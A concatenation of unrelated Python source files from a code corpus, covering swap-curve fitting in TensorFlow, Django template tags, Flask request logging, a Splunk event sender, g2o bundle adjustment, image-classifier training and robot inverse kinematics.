computing the objective function for the conjugate gradient optimization.
By default the weights are set to be the inverse of maturities.
curve_tolerance: Optional positive scalar `Tensor` of same dtype as
elements of `bond_cashflows`. The absolute tolerance for terminating the
iterations used to fit the rate curve. The iterations are stopped when the
estimated discounts at the expiry times of the bond_cashflows change by a
amount smaller than `discount_tolerance` in an iteration.
Default value: 1e-8.
maximum_iterations: Optional positive integer `Tensor`. The maximum number
of iterations permitted when fitting the curve.
Default value: 50.
dtype: `tf.Dtype`. If supplied the dtype for the (elements of)
`float_leg_start_times`, and `fixed_leg_start_times`.
Default value: None which maps to the default dtype inferred by
TensorFlow.
name: Python str. The name to give to the ops created by this function.
Default value: `None` which maps to 'swap_curve'.
Returns:
curve_builder_result: An instance of `SwapCurveBuilderResult` containing the
following attributes.
times: Rank 1 real `Tensor`. Times for the computed discount rates. These
are chosen to be the expiry times of the supplied cashflows.
discount_rates: Rank 1 `Tensor` of the same dtype as `times`.
The inferred discount rates.
discount_factor: Rank 1 `Tensor` of the same dtype as `times`.
The inferred discount factors.
initial_discount_rates: Rank 1 `Tensor` of the same dtype as `times`. The
initial guess for the discount rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
The procedure is said to have converged when the maximum absolute
difference in the discount factors from one iteration to the next falls
below the `discount_tolerance`.
failed: Scalar boolean `Tensor`. Whether the procedure failed. Procedure
may fail either because a NaN value was encountered for the discount
rates or the discount factors.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The value of the ibjective function
evaluated using the fitted swap curve.
Raises:
ValueError: If the initial state of the curve is not
supplied to the function.
"""
with tf.name_scope(name or 'swap_curve'):
if optimize is None:
optimize = optimizer.conjugate_gradient_minimize
present_values = _convert_to_tensors(dtype, present_values,
'present_values')
dtype = present_values[0].dtype
if present_values_settlement_times is None:
pv_settle_times = [tf.zeros_like(pv) for pv in present_values]
else:
pv_settle_times = present_values_settlement_times
float_leg_start_times = _convert_to_tensors(dtype, float_leg_start_times,
'float_leg_start_times')
float_leg_end_times = _convert_to_tensors(dtype, float_leg_end_times,
'float_leg_end_times')
float_leg_daycount_fractions = _convert_to_tensors(
dtype, float_leg_daycount_fractions, 'float_leg_daycount_fractions')
fixed_leg_start_times = _convert_to_tensors(dtype, fixed_leg_start_times,
'fixed_leg_start_times')
fixed_leg_end_times = _convert_to_tensors(dtype, fixed_leg_end_times,
'fixed_leg_end_times')
fixed_leg_daycount_fractions = _convert_to_tensors(
dtype, fixed_leg_daycount_fractions, 'fixed_leg_daycount_fractions')
fixed_leg_cashflows = _convert_to_tensors(dtype, fixed_leg_cashflows,
'fixed_leg_cashflows')
pv_settle_times = _convert_to_tensors(dtype, pv_settle_times,
'pv_settle_times')
if instrument_weights is None:
instrument_weights = _initialize_instrument_weights(float_leg_end_times,
fixed_leg_end_times,
dtype=dtype)
else:
instrument_weights = _convert_to_tensors(dtype, instrument_weights,
'instrument_weights')
if curve_interpolator is None:
def default_interpolator(xi, x, y):
return linear.interpolate(xi, x, y, dtype=dtype)
curve_interpolator = default_interpolator
self_discounting_float_leg = False
self_discounting_fixed_leg = False
# Determine how the floating and fixed leg will be discounted. If separate
# discount curves for each leg are not specified, the curve will be self
# discounted using the swap curve.
if float_leg_discount_rates is None and fixed_leg_discount_rates is None:
self_discounting_float_leg = True
self_discounting_fixed_leg = True
float_leg_discount_rates = [0.0]
float_leg_discount_times = [0.]
fixed_leg_discount_rates = [0.]
fixed_leg_discount_times = [0.]
elif fixed_leg_discount_rates is None:
fixed_leg_discount_rates = float_leg_discount_rates
fixed_leg_discount_times = float_leg_discount_times
elif float_leg_discount_rates is None:
self_discounting_float_leg = True
float_leg_discount_rates = [0.]
float_leg_discount_times = [0.]
# Create tensors for discounting curves
float_leg_discount_rates = _convert_to_tensors(dtype,
float_leg_discount_rates,
'float_disc_rates')
float_leg_discount_times = _convert_to_tensors(dtype,
float_leg_discount_times,
'float_disc_times')
fixed_leg_discount_rates = _convert_to_tensors(dtype,
fixed_leg_discount_rates,
'fixed_disc_rates')
fixed_leg_discount_times = _convert_to_tensors(dtype,
fixed_leg_discount_times,
'fixed_disc_times')
if initial_curve_rates is not None:
initial_rates = tf.convert_to_tensor(
initial_curve_rates, dtype=dtype, name='initial_rates')
else:
# TODO(b/144600429): Create a logic for a meaningful initial state of the
# curve
raise ValueError('Initial state of the curve is not specified.')
return _build_swap_curve(float_leg_start_times,
float_leg_end_times,
float_leg_daycount_fractions,
fixed_leg_start_times,
fixed_leg_end_times,
fixed_leg_cashflows,
fixed_leg_daycount_fractions,
float_leg_discount_rates,
float_leg_discount_times,
fixed_leg_discount_rates,
fixed_leg_discount_times,
self_discounting_float_leg,
self_discounting_fixed_leg,
present_values,
pv_settle_times,
optimize,
curve_interpolator,
initial_rates,
instrument_weights,
curve_tolerance,
maximum_iterations)
def _build_swap_curve(float_leg_start_times, float_leg_end_times,
float_leg_daycount_fractions, fixed_leg_start_times,
fixed_leg_end_times, fixed_leg_cashflows,
fixed_leg_daycount_fractions, float_leg_discount_rates,
float_leg_discount_times, fixed_leg_discount_rates,
fixed_leg_discount_times, self_discounting_float_leg,
self_discounting_fixed_leg, present_values,
pv_settlement_times, optimize, curve_interpolator,
initial_rates, instrument_weights, curve_tolerance,
maximum_iterations):
"""Build the zero swap curve."""
# The procedure uses optimization to estimate the swap curve as follows:
# 1. Start with an initial state of the swap curve.
# 2. Define a loss function which measures the deviations between model prices
# of the IR swaps and their present values specified as input.
# 3. Use numerical optimization (currently conjugate gradient optimization) to
# to build the swap curve such that the loss function is minimized.
del fixed_leg_start_times, float_leg_daycount_fractions
curve_tensors = _create_curve_building_tensors(
float_leg_start_times, float_leg_end_times, fixed_leg_end_times,
pv_settlement_times)
expiry_times = curve_tensors.expiry_times
calc_groups_float = curve_tensors.calc_groups_float
calc_groups_fixed = curve_tensors.calc_groups_fixed
settle_times_float = curve_tensors.settle_times_float
settle_times_fixed = curve_tensors.settle_times_fixed
float_leg_calc_times_start = tf.concat(float_leg_start_times, axis=0)
float_leg_calc_times_end = tf.concat(float_leg_end_times, axis=0)
calc_fixed_leg_cashflows = tf.concat(fixed_leg_cashflows, axis=0)
calc_fixed_leg_daycount = tf.concat(fixed_leg_daycount_fractions, axis=0)
fixed_leg_calc_times = tf.concat(fixed_leg_end_times, axis=0)
def _interpolate(x1, x_data, y_data):
return curve_interpolator(x1, x_data, y_data)
@make_val_and_grad_fn
def loss_function(x):
"""Loss function for the optimization."""
# Currently the loss function is a weighted root mean squared difference
# between the model PV and market PV. The model PV is interest rate swaps is
# computed as follows:
# 1. Interpolate the swap curve at intermediate times required to compute
# forward rates for the computation of floating cashflows.
# 2. Interpolate swap curve or the discount curve (if a separate discount
# curve is specified) at intermediate cashflow times.
# 3. Compute the PV of the swap as the aggregate of floating and fixed legs.
# 4. Compute the loss (which is being minized) as the weighted root mean
# squared difference between the model PV (computed above) and the market
# PV (specified as input).
rates_start = _interpolate(float_leg_calc_times_start, expiry_times, x)
rates_end = _interpolate(float_leg_calc_times_end, expiry_times, x)
float_cashflows = (
tf.math.exp(float_leg_calc_times_end * rates_end) /
tf.math.exp(float_leg_calc_times_start * rates_start) - 1.)
if self_discounting_float_leg:
float_discount_rates = rates_end
float_settle_rates = _interpolate(settle_times_float, expiry_times, x)
else:
float_discount_rates = _interpolate(float_leg_calc_times_end,
float_leg_discount_times,
float_leg_discount_rates)
float_settle_rates = _interpolate(settle_times_float,
float_leg_discount_times,
float_leg_discount_rates)
if self_discounting_fixed_leg:
fixed_discount_rates = _interpolate(fixed_leg_calc_times, expiry_times, x)
fixed_settle_rates = _interpolate(settle_times_fixed, expiry_times, x)
else:
fixed_discount_rates = _interpolate(fixed_leg_calc_times,
fixed_leg_discount_times,
fixed_leg_discount_rates)
fixed_settle_rates = _interpolate(settle_times_fixed,
fixed_leg_discount_times,
fixed_leg_discount_rates)
# exp(-r(t) * t) / exp(-r(t_s) * t_s)
calc_discounts_float_leg = (
tf.math.exp(-float_discount_rates * float_leg_calc_times_end +
float_settle_rates * settle_times_float))
calc_discounts_fixed_leg = (
tf.math.exp(-fixed_discount_rates * fixed_leg_calc_times +
fixed_settle_rates * settle_times_fixed))
float_pv = tf.math.segment_sum(float_cashflows * calc_discounts_float_leg,
calc_groups_float)
fixed_pv = tf.math.segment_sum(
calc_fixed_leg_daycount * calc_fixed_leg_cashflows *
calc_discounts_fixed_leg, calc_groups_fixed)
swap_pv = float_pv + fixed_pv
value = tf.math.reduce_sum(input_tensor=instrument_weights *
(swap_pv - present_values)**2)
return value
optimization_result = optimize(
loss_function, initial_position=initial_rates, tolerance=curve_tolerance,
max_iterations=maximum_iterations)
discount_rates = optimization_result.position
discount_factors = tf.math.exp(-discount_rates * expiry_times)
results = scc.SwapCurveBuilderResult(
times=expiry_times,
rates=discount_rates,
discount_factors=discount_factors,
initial_rates=initial_rates,
converged=optimization_result.converged,
failed=optimization_result.failed,
iterations=optimization_result.num_iterations,
objective_value=optimization_result.objective_value)
return results
def _convert_to_tensors(dtype, input_array, name):
"""Converts the supplied list to a tensor."""
output_tensor = [
tf.convert_to_tensor(
x, dtype=dtype, name=name + '_{}'.format(i))
for i, x in enumerate(input_array)
]
return output_tensor
def _initialize_instrument_weights(float_times, fixed_times, dtype):
"""Function to compute default initial weights for optimization."""
weights = tf.ones(len(float_times), dtype=dtype)
one = tf.ones([], dtype=dtype)
float_times_last = tf.stack([times[-1] for times in float_times])
fixed_times_last = tf.stack([times[-1] for times in fixed_times])
weights = tf.maximum(one / float_times_last, one / fixed_times_last)
weights = tf.minimum(one, weights)
return tf.unstack(weights, name='instrument_weights')
CurveFittingVars = collections.namedtuple(
'CurveFittingVars',
[
# The `Tensor` of maturities at which the curve will be built.
# Coorspond to maturities on the underlying instruments
'expiry_times',
# `Tensor` containing the instrument index of each floating cashflow
'calc_groups_float',
# `Tensor` containing the instrument index of each fixed cashflow
'calc_groups_fixed',
# `Tensor` containing the settlement time of each floating cashflow
'settle_times_float',
# `Tensor` containing the settlement time of each fixed cashflow
'settle_times_fixed'
])
def _create_curve_building_tensors(float_leg_start_times,
float_leg_end_times,
fixed_leg_end_times,
pv_settlement_times):
"""Helper function to create tensors needed for curve construction."""
calc_groups_float = []
calc_groups_fixed = []
expiry_times = []
settle_times_float = []
settle_times_fixed = []
num_instruments = len(float_leg_start_times)
for i in range(num_instruments):
expiry_times.append(
tf.math.maximum(float_leg_end_times[i][-1], fixed_leg_end_times[i][-1]))
calc_groups_float.append(
tf.fill(tf.shape(float_leg_start_times[i]), i))
calc_groups_fixed.append(tf.fill(tf.shape(fixed_leg_end_times[i]), i))
settle_times_float.append(tf.fill(tf.shape(float_leg_start_times[i]),
pv_settlement_times[i]))
settle_times_fixed.append(tf.fill(tf.shape(fixed_leg_end_times[i]),
pv_settlement_times[i]))
expiry_times = tf.stack(expiry_times, axis=0)
calc_groups_float = tf.concat(calc_groups_float, axis=0)
calc_groups_fixed = tf.concat(calc_groups_fixed, axis=0)
settle_times_float = tf.concat(settle_times_float, axis=0)
settle_times_fixed = tf.concat(settle_times_fixed, axis=0)
return CurveFittingVars(expiry_times=expiry_times,
calc_groups_float=calc_groups_float,
calc_groups_fixed=calc_groups_fixed,
settle_times_float=settle_times_float,
settle_times_fixed=settle_times_fixed)
| StarcoderdataPython |
5135402 | """blogアプリで主に使用するフィルタ・タグ
by_the_timeタグ
人に優しい表現で、文字列を返す(n時間前)
<span class="badge badge-danger badge-pill">{% by_the_time recomment.created_at %}</span>
のようにして使います。
url_replaceタグ
キーワード検索をした際等の、他GETパラメータと?page=のページングを両立させる場合に使います。
<a href="?{% url_replace request 'page' page_obj.previous_page_number %}" aria-label="Previous">
のようにして使います。
blogフィルター
{{ post.text | linebreaksbr | blog }}
のようにして使います。
投稿画面での、[filter name]text[end]等の特殊な構文を評価するためのフィルター
"""
from django import template
from django.utils import timezone
from django.utils.html import escape
from django.utils.safestring import mark_safe, SafeData
from . import filters
register = template.Library()
@register.filter(is_safe=True, needs_autoescape=True)
def blog(value, autoescape=True):
"""本文中の[filter name]text[end]を、適切なHTMLタグに変換する."""
# html等は、一度エスケープ処理する
autoescape = autoescape and not isinstance(value, SafeData)
if autoescape:
value = escape(value)
value = filters.DefaultConverter(value).run()
return mark_safe(value)
@register.simple_tag
def url_replace(request, field, value):
"""GETパラメータの一部を置き換える."""
url_dict = request.GET.copy()
url_dict[field] = value
return url_dict.urlencode()
@register.simple_tag
def by_the_time(dt):
"""その時間が今からどのぐらい前か、人にやさしい表現で返す."""
result = timezone.now() - dt
s = result.total_seconds()
hours = int(s / 3600)
if hours >= 24:
day = int(hours / 24)
return '約{0}日前'.format(day)
elif hours == 0:
minute = int(s / 60)
return '約{0}分前'.format(minute)
else:
return '約{0}時間前'.format(hours)
| StarcoderdataPython |
9753713 | import sqlite3
import os
db_abs_path = os.path.dirname(os.path.realpath(__file__)) + '/globomantics.db'
print("Options: (items, comments, categories, subcategories, all)")
table = input("Show table: ")
conn = sqlite3.connect(db_abs_path)
c = conn.cursor()
def show_items():
try:
items = c.execute("""SELECT
i.id, i.title, i.description, i.price, i.image, c.name, c.id, s.name, s.id
FROM
items AS i
INNER JOIN categories AS c ON i.category_id = c.id
INNER JOIN subcategories AS s ON i.subcategory_id = s.id
""")
print("ITEMS")
print("#############")
for row in items:
print("ID: ", row[0]),
print("Title: ", row[1]),
print("Description: ", row[2]),
print("Price: ", row[3]),
print("Image: ", row[4]),
print("Category: ", row[5], "(", row[6], ")"),
print("SubCategory: ", row[7], "(", row[8], ")"),
print("\n")
except:
print("Something went wrong, please run db_init.py to initialize the database.")
conn.close()
def show_comments():
try:
comments = c.execute("""SELECT
c.id, c.content, i.title, i.id
FROM
comments AS c
INNER JOIN items AS i ON c.item_id = i.id
""")
print("COMMENTS")
print("#############")
for row in comments:
print("ID: ", row[0]),
print("Content: ", row[1]),
print("Item: ", row[2], "(", row[3], ")")
print("\n")
except:
print("Something went wrong, please run db_init.py to initialize the database.")
conn.close()
def show_categories():
try:
categories = c.execute("SELECT * FROM categories")
print("CATEGORIES")
print("#############")
for row in categories:
print("ID: ", row[0]),
print("Name: ", row[1])
print("\n")
except:
print("Something went wrong, please run db_init.py to initialize the database.")
conn.close()
def show_subcategories():
try:
subcategories = c.execute("SELECT s.id, s.name, c.name, c.id FROM subcategories AS s INNER JOIN categories AS c ON s.category_id = c.id")
print("SUBCATEGORIES")
print("#############")
for row in subcategories:
print("ID: ", row[0]),
print("Name: ", row[1]),
print("Category: ", row[2], "(", row[3], ")")
print("\n")
except:
print("Something went wrong, please run db_init.py to initialize the database.")
conn.close()
if table == "items":
show_items()
elif table == "comments":
show_comments()
elif table == "categories":
show_categories()
elif table == "subcategories":
show_subcategories()
elif table == "all":
show_items()
show_comments()
show_categories()
show_subcategories()
else:
print("This option does not exist.")
conn.close()
| StarcoderdataPython |
1773244 | <gh_stars>1-10
import time
import json
from flask import session, request, g, flash
from app import app
import config
logfile = open(config.logfilename, 'a')
def log(dictionary):
logfile.write(json.dumps(dictionary) + '\n')
logfile.flush()
id_prefix = str(int(time.time()))
id_counter = 0
def get_new_id():
global id_counter
id_counter += 1
return '%s-%d' % (id_prefix, id_counter)
@app.before_request
def before():
# time() has to have sub-second resolution for this to work
g.response_start_time = time.time()
g.notes = {}
# accuracy: typically less than 5% false positives and less than 20% false negatives
def seems_like_a_bot():
try:
# url to bot's home page
if '://' in request.headers['User-Agent']:
return True
# modern browsers can decode deflate
if not 'deflate' in request.headers['Accept-Encoding']:
return True
# modern browsers say which mimetype they are expecting
if request.headers['Accept'] == '*/*':
return True
except:
return True
return False
def shouldDeleteCookie(response):
# Nothing to delete
if not session:
return False
# Do Not Track
if request.headers.get('Dnt') == '1':
return True
return False
def shouldSetCookie(response):
# There is a cookie already
if 'id' in session:
return False
# No cookie for users requesting Do Not Track.
if request.headers.get('Dnt') == '1':
return False
return True
@app.after_request
def after(response):
if shouldSetCookie(response):
session.permanent = True
session['id'] = get_new_id()
elif shouldDeleteCookie(response):
session.clear()
now = time.time()
# Not including log write time, which might be significant.
# We should probably do it on background.
response_time = now - g.response_start_time
# TODO: possibly error prone!
for key in session:
if type(session[key]) == type(bytes()):
session[key] = session[key].decode()
data = {
'timestamp' : now,
'response-time': response_time,
#'ip' : request.remote_addr, # always 127.0.0.1 because we are behind nginx
'path': request.path,
'args': dict(request.args),
'method': request.method,
'session': dict(session),
'request-headers': dict(request.headers),
'form': dict(request.form),
'response-status': response.status_code,
'response-headers': dict(response.headers),
'notes': g.notes
}
try:
log(data)
except:
pass # Don't bother the user if json complains about data types (py2 -> py3 problem)
return response
| StarcoderdataPython |
9721952 | import pytest
from mock import mock
from snipssonos.entities.device import Device
from snipssonos.use_cases.speaker_interrupt import SpeakerInterruptUseCase
from snipssonos.use_cases.request_objects import SpeakerInterruptRequestObject
from snipssonos.exceptions import NoReachableDeviceException
@pytest.fixture
def connected_device():
return Device(
name="Anthony's Sonos",
identifier="RINCON_XXXX",
volume=10
)
def test_use_case_empty_parameters(connected_device):
device_discovery_service = mock.Mock()
device_discovery_service.get.return_value = connected_device # We mock the device discovery service
device_transport_control_service = mock.Mock()
speaker_interrupt_uc = SpeakerInterruptUseCase(device_discovery_service, device_transport_control_service)
speaker_interrupt_request = SpeakerInterruptRequestObject.from_dict({})
result_object = speaker_interrupt_uc.execute(speaker_interrupt_request)
device_discovery_service.get.assert_called()
device_transport_control_service.pause.assert_called()
device_transport_control_service.pause.assert_called_with(connected_device)
assert bool(result_object) is True
def test_use_case_no_reachable_device():
device_discovery_service = mock.Mock()
device_discovery_service.get.side_effect = NoReachableDeviceException("No reachable Sonos devices") # We mock the device discovery service
device_transport_control_service = mock.Mock()
speaker_interrupt_uc = SpeakerInterruptUseCase(device_discovery_service, device_transport_control_service)
speaker_interrupt_request = SpeakerInterruptRequestObject()
result_obj = speaker_interrupt_uc.execute(speaker_interrupt_request)
assert bool(result_obj) is False
assert result_obj.message == "NoReachableDeviceException: No reachable Sonos devices"
| StarcoderdataPython |
9627937 | <filename>thirdparty/g2opy/python/examples/sba_demo.py
# https://github.com/RainerKuemmerle/g2o/blob/master/g2o/examples/sba/sba_demo.cpp
import numpy as np
import g2o
from collections import defaultdict
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--noise', dest='pixel_noise', type=float, default=1.,
help='noise in image pixel space (default: 1.0)')
parser.add_argument('--outlier', dest='outlier_ratio', type=float, default=0.,
help='probability of spuroius observation (default: 0.0)')
parser.add_argument('--robust', dest='robust_kernel', action='store_true', help='use robust kernel')
parser.add_argument('--dense', action='store_true', help='use dense solver')
parser.add_argument('--seed', type=int, help='random seed', default=0)
args = parser.parse_args()
def main():
optimizer = g2o.SparseOptimizer()
solver = g2o.BlockSolverSE3(g2o.LinearSolverCSparseSE3())
solver = g2o.OptimizationAlgorithmLevenberg(solver)
optimizer.set_algorithm(solver)
true_points = np.hstack([
np.random.random((500, 1)) * 3 - 1.5,
np.random.random((500, 1)) - 0.5,
np.random.random((500, 1)) + 3])
focal_length = (500, 500)
principal_point = (320, 240)
baseline = 0.075
g2o.VertexSCam.set_cam(*focal_length, *principal_point, baseline)
true_poses = []
num_pose = 5
for i in range(num_pose):
# pose here transform points from world coordinates to camera coordinates
pose = g2o.Isometry3d(np.identity(3), [i*0.04-1, 0, 0])
true_poses.append(pose)
v_se3 = g2o.VertexSCam()
v_se3.set_id(i)
v_se3.set_estimate(pose)
if i < 2:
v_se3.set_fixed(True)
v_se3.set_all()
optimizer.add_vertex(v_se3)
point_id = num_pose
inliers = dict()
sse = defaultdict(float)
for i, point in enumerate(true_points):
visible = []
for j in range(num_pose):
z = optimizer.vertex(j).map_point(point)
if 0 <= z[0] < 640 and 0 <= z[1] < 480:
visible.append((j, z))
if len(visible) < 2:
continue
vp = g2o.VertexSBAPointXYZ()
vp.set_id(point_id)
vp.set_marginalized(True)
vp.set_estimate(point + np.random.randn(3))
optimizer.add_vertex(vp)
inlier = True
for j, z in visible:
if np.random.random() < args.outlier_ratio:
inlier = False
z = np.array([
np.random.uniform(64, 640),
np.random.uniform(0, 480),
np.random.uniform(0, 64)]) # disparity
z[2] = z[0] - z[2]
z += np.random.randn(3) * args.pixel_noise * [1, 1, 1/16.]
edge = g2o.Edge_XYZ_VSC()
edge.set_vertex(0, vp)
edge.set_vertex(1, optimizer.vertex(j))
edge.set_measurement(z)
edge.set_information(np.identity(3))
if args.robust_kernel:
edge.set_robust_kernel(g2o.RobustKernelHuber())
edge.set_parameter_id(0, 0)
optimizer.add_edge(edge)
if inlier:
inliers[point_id] = i
error = vp.estimate() - true_points[i]
sse[0] += np.sum(error**2)
point_id += 1
print('Performing full BA:')
optimizer.initialize_optimization()
optimizer.set_verbose(True)
optimizer.optimize(10)
for i in inliers:
vp = optimizer.vertex(i)
error = vp.estimate() - true_points[inliers[i]]
sse[1] += np.sum(error**2)
print('\nRMSE (inliers only):')
print('before optimization:', np.sqrt(sse[0] / len(inliers)))
print('after optimization:', np.sqrt(sse[1] / len(inliers)))
if __name__ == '__main__':
if args.seed > 0:
np.random.seed(args.seed)
main()
| StarcoderdataPython |
4916081 | <gh_stars>0
from tarfile import ENCODING
from xml.etree.ElementTree import Element, SubElement, Comment, tostring
from xml.etree import ElementTree
from xml.dom import minidom
import codecs
def prettify(elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = ElementTree.tostring(elem, encoding='unicode')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
size = 1920
name = 'test1'
annotation = Element('annotation')
folder = SubElement(annotation,'folder')
folder.text = 'Slide Generator'
filename = SubElement(annotation,'filename')
filename.text = name + '.jpg'
path = SubElement(annotation,'path')
path.text = "C:\\Users\\François\\Documents\\GitHub\\aicompression\\Slide Generator\\images_generated\\" + name + ".jpg"
source = SubElement(annotation,'source')
database = SubElement(source,"database")
database.text = "Unknown"
size_el = SubElement(annotation,"size")
width_el = SubElement(size_el,"width")
width_el.text = str(size)
height_el = SubElement(size_el,"height")
height_el.text = str(2)
depth_el = SubElement(size_el,"width")
depth_el.text = str(size)
xml_file = codecs.open(name +'.xml',"w",'utf-8')
xml_file.write(prettify(annotation))
print(prettify(annotation)) | StarcoderdataPython |
1972128 | import datetime
import time
import logging
import json
from uuid import UUID
import os
from django.conf import settings
import requests
from threading import Thread
from .utils import _get_request
class SplunkEvent(object):
_key = None
_timestamp = None
_request = None
_user = None
_auth = None
_start = None
_obj = None
_name = None
_auth_key = "Splunk {0}".format(settings.SPLUNK_TOKEN)
def __init__(self, *args, **kwargs):
if not settings.SPLUNK_LOGS:
return
self._key = kwargs.pop('key', "Generic")
self._timestamp = str(time.time())
self._request = kwargs.pop('request', _get_request())
self._user = kwargs.pop('user', None)
self._name = kwargs.pop('name', None)
self._obj = kwargs.pop('obj', None)
if self._request is not None:
try:
self._auth = self._request.user.is_authenticated()
self._user = self._request.session.get('user_id', None)
except:
self._auth = False
ran_shortcut = self.package_obj(self._obj)
if ran_shortcut:
if settings.SPLUNK_THREAD_EVENTS:
Thread(target=self.send_to_splunk).start()
else:
self.send_to_splunk()
def package_obj(self, obj):
"""
Shortcut method if an object is passed to the init method.
Generally used for objects that have a to_json() method.
"""
if obj is None:
return False
if isinstance(obj, list):
## if it is a list of objects, handle it in self.format()
return True
if 'to_json' in dir(obj):
for k, v in obj.to_json().iteritems():
setattr(self, k, v)
elif isinstance(obj, dict):
for key, value in obj.iteritems():
if type(value) is datetime.datetime:
setattr(self, key, value.strftime('%m/%d/%Y %H:%M:%S'))
elif type(value) is UUID:
setattr(self, key, str(value))
else:
setattr(self, key, value)
else:
for oa in [x for x in obj.__dict__ if not x.startswith('_')]:
if type(getattr(obj, oa)) is datetime.datetime:
setattr(self,
oa,
getattr(obj, oa).strftime('%m/%d/%Y %H:%M:%S'))
elif type(getattr(obj, oa)) is UUID:
setattr(self, oa, str(getattr(obj, oa)))
else:
setattr(self, oa, getattr(obj, oa))
return True
def send_to_splunk(self):
url = settings.SPLUNK_ADDRESS + ":" + \
settings.SPLUNK_EVENT_COLLECTOR_PORT + \
'/services/collector/event'
if settings.SPLUNK_HTTPS:
url = "https://" + url
else:
url = "http://" + url
headers = {'Authorization': self._auth_key}
r = requests.post(url,
headers=headers,
data=json.dumps(self.format()),
verify=False)
if r.status_code > 200:
# logging.error(
# 'error sending splunk event to http collector: {0}'.format(
# r.json()))
# attempt to avoid recursion with the logging handler
print 'error sending splunk event to http collector: {0}'.format(
r.text)
def format_request(self):
""" Format the request to JSON. """
if not self._request:
return {}
else:
data = {
'path': self._request.get_full_path(),
'host': self._request.get_host(),
'GET': self._request.GET,
'method': self._request.method,
'META': {
# 'HTTP_HOST': self._request.META.get('HTTP_HOST', None),
# 'HTTP_REFERER': self._request.META.get('HTTP_REFERER', None),
# 'HTTP_USER_AGENT': self._request.META.get('HTTP_USER_AGENT', None),
# 'HTTP_X_FORWARDED_FOR': self._request.META.get('HTTP_X_FORWARDED_FOR', None),
# 'CLIENT': 'OTHER',
},
}
for k,v in self._request.META.iteritems():
if type(v) == int or type(v) == str:
data['META'][k] = v
if 'is_ios' and 'is_android' in self._request.__dict__:
if self._request.is_ios:
data['META']['CLIENT'] = 'ios'
elif self._request.is_android:
data['META']['CLIENT'] = 'android'
else:
data['META']['CLIENT'] = 'android'
if hasattr(settings, "VERSION"):
data['version'] = settings.VERSION
try:
if self._request.method == "DELETE":
data['DELETE'] = self._request.DELETE
elif self._request.method == "PUT":
data['PUT'] = self._request.PUT
elif self._request.method == "POST":
data['POST'] = self._request.POST
except Exception as e:
pass
return data
def format(self):
""" Format the SplunkEvent to JSON. """
if isinstance(self._obj, list):
# list of objects
event_obj = []
for o in self._obj:
item = {}
if 'to_json' in dir(o):
item = o.to_json()
elif isinstance(o, dict):
item = o
else:
for oa in [x for x in o.__dict__ if not x.startswith('_')]:
if type(getattr(o, oa)) is datetime.datetime:
item[oa] = getattr(o, oa).strftime(
'%m/%d/%Y %H:%M:%S')
elif type(getattr(o, oa)) is UUID:
item[oa] = str(getattr(o, oa))
else:
item[oa] = getattr(o, oa)
event_obj.append(item)
else:
event_obj = {}
for x in [attr for attr in self.__dict__ if not attr.startswith('_')]:
event_obj[x] = getattr(self, x)
data = {}
data['time'] = self._timestamp
data['sourcetype'] = self._key
data['event'] = {
'request': self.format_request(),
'auth': self._auth,
'user': self._user,
'eventData': event_obj,
'event': self._name,
}
return data
def start_timer(self):
""" Start a Timer. """
self._start = time.time()
def stop_timer(self):
""" Stop the Timer and assign value to object. """
try:
self.execution = int(round((time.time() - self._start)*1000))
except AttributeError:
logging.error('you didnt start the timer!')
| StarcoderdataPython |
1821740 | import api.fanyi as fanyi
api = {
'fanyi': {
'google': fanyi.google_fanyi_query,
'tencent': fanyi.tencent_fanyi_query,
'youdao': fanyi.youdao_fanyi_query,
'baidu': fanyi.baidu_fanyi_query
}
}
def api_call(action, param):
if action == 'fanyi':
vender = param['vender']
return api[action][vender](param['q'], param['from'], param['to'])
| StarcoderdataPython |
3545047 | import numpy as np
import matplotlib.pyplot as plt
import os, random
import json
import torch
from torch import nn
from torch import optim
import torch.nn.functional as F
import torchvision
from torchvision import datasets, transforms, models
from collections import OrderedDict
from PIL import Image
import time
import matplotlib.image as mp
import argparse
import essentials
p = argparse.ArgumentParser()
p.add_argument('--data_dir', type=str, default='ImageClassifier/flowers')
p.add_argument('--gpu', action='store_true', default='cuda')
p.add_argument('--epochs', type=int, default=2)
p.add_argument('--arch', type=str,default='vgg16')
p.add_argument('--learning_rate', type=float, default=0.001)
p.add_argument('--checkpoint', type=str)
p.add_argument('--criterion', type=float, default=nn.NLLLoss())
p.add_argument('--save_file', type=str, default='classifier.pth')
p.add_argument('--hiddenlayer1',type=int,default=4096)
p.add_argument('--hiddenlayer2', type=int,default=102)
arg = p.parse_args()
train_loader,test_loader,valid_loader = essentials.data_loader(arg)
model = essentials.model(arg.arch,arg.hiddenlayer1,arg.hiddenlayer2)
model = essentials.model_loader(arg.save_file,arg.hiddenlayer1,arg.hiddenlayer2,arg.arch)
optimizer = optim.Adam(model.classifier.parameters(), lr=arg.learning_rate)
model = essentials.model_trainer(model,arg.epochs,train_loader,valid_loader,arg.criterion,optimizer, arg.gpu)
essentials.model_tester(train_loader,model, arg.gpu)
checkpoint = essentials.save(model,arg)
| StarcoderdataPython |
6434111 | # Third party code
#
# The following code are copied or modified from:
# https://github.com/google-research/motion_imitation
"""The inverse kinematic utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import typing
_IDENTITY_ORIENTATION = (0, 0, 0, 1)
def joint_angles_from_link_position(
robot: typing.Any,
link_position: typing.Sequence[float],
link_id: int,
joint_ids: typing.Sequence[int],
base_translation: typing.Sequence[float] = (0, 0, 0),
base_rotation: typing.Sequence[float] = (0, 0, 0, 1)):
"""Uses Inverse Kinematics to calculate joint angles.
Args:
robot: A robot instance.
link_position: The (x, y, z) of the link in the body frame. This local frame
is transformed relative to the COM frame using a given translation and
rotation.
link_id: The link id as returned from loadURDF.
joint_ids: The positional index of the joints. This can be different from
the joint unique ids.
base_translation: Additional base translation.
base_rotation: Additional base rotation.
Returns:
A list of joint angles.
"""
# Projects to local frame.
base_position, base_orientation = robot.GetBasePosition(
), robot.GetBaseOrientation()
base_position, base_orientation = robot.pybullet_client.multiplyTransforms(
base_position, base_orientation, base_translation, base_rotation)
# Projects to world space.
world_link_pos, _ = robot.pybullet_client.multiplyTransforms(
base_position, base_orientation, link_position, _IDENTITY_ORIENTATION)
ik_solver = 0
all_joint_angles = robot.pybullet_client.calculateInverseKinematics(
robot.quadruped, link_id, world_link_pos, solver=ik_solver)
# Extract the relevant joint angles.
